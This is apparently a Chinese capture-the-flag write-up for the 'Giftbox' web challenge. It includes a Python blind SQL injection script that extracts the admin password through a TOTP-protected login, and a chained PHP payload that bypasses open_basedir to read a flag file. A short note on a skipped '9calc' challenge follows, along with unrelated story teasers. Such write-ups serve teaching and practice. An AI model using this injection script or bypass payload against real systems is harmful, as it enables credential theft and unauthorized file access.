0x04 Giftbox

第一层考点:login处盲注
大前提,有个时间校验,需要系统为北京时间,直接设定时区为北京时区比较方便。
查看view-source:http://222.85.25.41:8090/js/知道pyotp.zip和>totp.min.js是采用了双因子认证
在此处得到关于双因子认证的信息view-source:http://222.85.25.41:8090/js/main.js

这个东西后面写脚本是TOTP用,测试发现在login处存在注入,测试payload:

login admin'/**/and/**/'1'='1 admin   返回login fail, password incorrect.
login admin'/**/and/**/'1'='2 admin   返回login fail, user not found.

直接写个脚本跑就行了,这里贴glzjin师傅写的二分法脚本。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import pyotp as pyotp

totp = pyotp.TOTP('GAXG24JTMZXGKZBU', 8, interval=5)

def main():
    get_all_databases()

def http_get(payload):
    r = requests.post('http://222.85.25.41:8090/shell.php', params={'a': 'login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin', 'totp': totp.now()},
                      data={'dir': '/', 'pos': '/', 'filename': 'usage.md'})

    print('login admin\'/**/and/**/(' + payload + ')/**/and/**/\'1\'=\'1 admin')
    print(r.text)
    if 'password' in r.text:
        return True
    else:
        return False

def get_all_databases():
    db_payload = "select/**/concat(password)/**/from/**/users"
    db_name = ""
    for y in range(1, 64):
        db_name_payload = "ascii(substr((" + db_payload + "),%d,1))" % (
            y)
        db_name += chr(half(db_name_payload))

    print("值:" + db_name)

def half(payload):
    low = 0
    high = 126
    while low <= high:
        mid = (low + high) / 2
        mid_num_payload = "%s/**/>/**/%d" % (payload, mid)
        if http_get(mid_num_payload):
            low = mid + 1
        else:
            high = mid - 1
    mid_num = int((low + high + 1) / 2)
    return mid_num

if __name__ == '__main__':
    main()

得到admin用户的密码为hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333},所以可以登入admin用户:

login admin hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333} 

第二层考点:bypass open_basedir

利用targeting随便给一些参数赋值,可以发现当前shell.php执行的是php代码,所以思路就是利用php代码来读取flag,因为赋值有长度限制,所以需要利用代码拼接,查看phpinfo()

targeting a phpinfo
targeting b assert
targeting c {$b($a())}

返回的System Fatal Error! 也是一个坑,这竟然是执行成功了,查看返回包就就好

可知存在open_basedir,也设置了disable_function,所以要绕open_basedir来读取其他目录文件,参考:https://xz.aliyun.com/t/4720 进行代码拼接,bypass open_basedir的payload:

chdir('css');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));

已经知道了需要跨两层目录,所以改写payload为:

targeting a chdir
targeting b css
targeting c {$a($b)}
targeting d ini_set
targeting e open_basedir
targeting f ..
targeting g {$d($e,$f)}
targeting h {$a($f)}
targeting i {$a($f)}
targeting j base64_
targeting k decode
targeting l $j$k
targeting m Ly8v
targeting n {$l($m)}
targeting o {$d($e,$n)}
targeting p print_r
targeting q file_get_
targeting r contents
targeting s $q$r
targeting t flag
targeting u {$p($s($t))}
launch

0x05 9calc

直接弃了~
源码地址:https://github.com/zsxsoft/my-ctf-challenges/tree/master/de1ctf2019/9-calc
官方wp:https://github.com/zsxsoft/my-ctf-challenges/blob/master/calcalcalc-family/3.mdh

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,189评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,577评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,857评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,703评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,705评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,620评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,995评论 3 396
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,656评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,898评论 1 298
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,639评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,720评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,395评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,982评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,953评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,195评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,907评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,472评论 2 342

推荐阅读更多精彩内容